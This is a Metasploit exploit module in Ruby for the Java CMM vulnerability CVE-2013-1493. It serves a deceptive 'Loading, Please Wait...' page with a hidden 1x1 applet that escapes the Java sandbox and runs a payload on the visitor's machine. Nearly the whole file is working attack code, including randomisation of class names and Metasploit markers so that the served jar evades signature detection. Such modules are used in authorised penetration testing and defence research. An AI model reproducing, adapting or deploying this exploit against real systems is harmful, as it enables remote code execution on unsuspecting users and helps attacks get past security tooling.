##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
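# Java CMM (CVE-2013-1493) browser exploit.
#
# Serves a landing page carrying a 1x1 applet. The applet archive is built on
# demand from the payload's own jar plus four precompiled exploit classes
# shipped under data/exploits/cve-2013-1493. The applet entry class ("Init")
# is renamed once, in setup, with a random name of the same length; the archive
# file name and the "metasploit"/"Payload" markers inside the payload jar are
# randomised on every .jar request. Click-to-play is NOT bypassed: the user has
# to accept the Java warning before the applet runs (see 'Description').
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn
  # The landing page is a plain <applet> tag; no JavaScript is needed client-side.
  autopwn_info({ :javascript => false })

  # Directory (relative to the framework install root) holding the
  # precompiled exploit classes loaded by setup.
  CLASS_DIR = [ 'data', 'exploits', 'cve-2013-1493' ]

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      # 'DefaultTarget' belongs in this info hash (it was stranded inside
      # on_request_uri in the pasted copy, which does not even parse).
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the four precompiled exploit classes and picks the random name the
  # applet entry class will be served under. Runs before the HTTP server
  # starts (super is called last).
  def setup
    @init_class           = read_exploit_class('Init.class')
    @leak_class           = read_exploit_class('Leak.class')
    @buffered_image_class = read_exploit_class('MyBufferedImage.class')
    @color_space_class    = read_exploit_class('MyColorSpace.class')

    # The replacement name has exactly the length of "Init": the rename is a
    # raw byte substitution inside a compiled .class, so it must not change the
    # size of any (length-prefixed) constant it touches. Note that every
    # occurrence of the substring "Init" in the file is rewritten, not just the
    # class name.
    @init_class_name = rand_text_alpha('Init'.length)
    @init_class.gsub!('Init', @init_class_name)

    super
  end

  # Dispatches a client request: "*.jar" gets the applet archive, a path ending
  # in "/" gets the landing page, and anything else is redirected to the
  # trailing-slash form of the resource so the relative archive URL resolves.
  #
  # @param cli     [Object] connected client, as handed in by the HttpServer mixin
  # @param request [Object] parsed request; only .uri is consulted
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      send_response(cli, build_jar, { 'Content-Type' => 'application/octet-stream' })
    when /\/$/
      # Deliberately not assigned to a local named `payload`: that would
      # shadow the payload() accessor used in build_jar.
      unless regenerate_payload(cli)
        print_error('Failed to generate the payload.')
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Builds the HTML landing page: a 1x1 applet whose archive name is random
  # (it only has to end in ".jar" to reach the .jar branch of on_request_uri)
  # and whose code attribute is the randomised entry class chosen in setup.
  #
  # @return [String] complete HTML document
  def generate_html
    archive = "#{rand_text_alpha(8)}.jar"
    html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html << %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html << %Q|<applet archive="#{archive}" code="#{@init_class_name}.class" width="1" height="1">|
    html << %Q|</applet></body></html>|
    html
  end

  private

  # Reads one precompiled class from data/exploits/cve-2013-1493.
  #
  # @param filename [String] bare file name, e.g. "Leak.class"
  # @return [String] raw file bytes (binary mode, so no newline translation)
  # @raise [Errno::ENOENT] if the framework data file is missing
  def read_exploit_class(filename)
    path = File.join(Msf::Config.install_root, *CLASS_DIR, filename)
    File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }
  end

  # Assembles the applet archive served on the .jar branch: the payload's jar
  # (payload.encoded_jar) plus the exploit classes, with the entry class under
  # its randomised name and the other three under their on-disk names.
  #
  # Every entry name and entry body then has the fixed markers "metasploit"
  # and "Payload" replaced by random strings of identical length, so the
  # served archive carries neither marker. Same-length replacement matters for
  # the same reason as in setup: the substitution also runs over compiled
  # class bytes.
  #
  # @return [Rex::Zip::Jar] archive with its manifest built, ready to send
  def build_jar
    jar = payload.encoded_jar
    jar.add_file("#{@init_class_name}.class", @init_class)
    jar.add_file('Leak.class', @leak_class)
    jar.add_file('MyBufferedImage.class', @buffered_image_class)
    jar.add_file('MyColorSpace.class', @color_space_class)

    replacements = {
      'metasploit' => rand_text_alpha('metasploit'.length),
      'Payload'    => rand_text_alpha('Payload'.length)
    }
    jar.entries.each do |entry|
      replacements.each do |marker, random|
        entry.name.gsub!(marker, random)
        entry.data = entry.data.gsub(marker, random)
      end
    end

    jar.build_manifest
    jar
  end
end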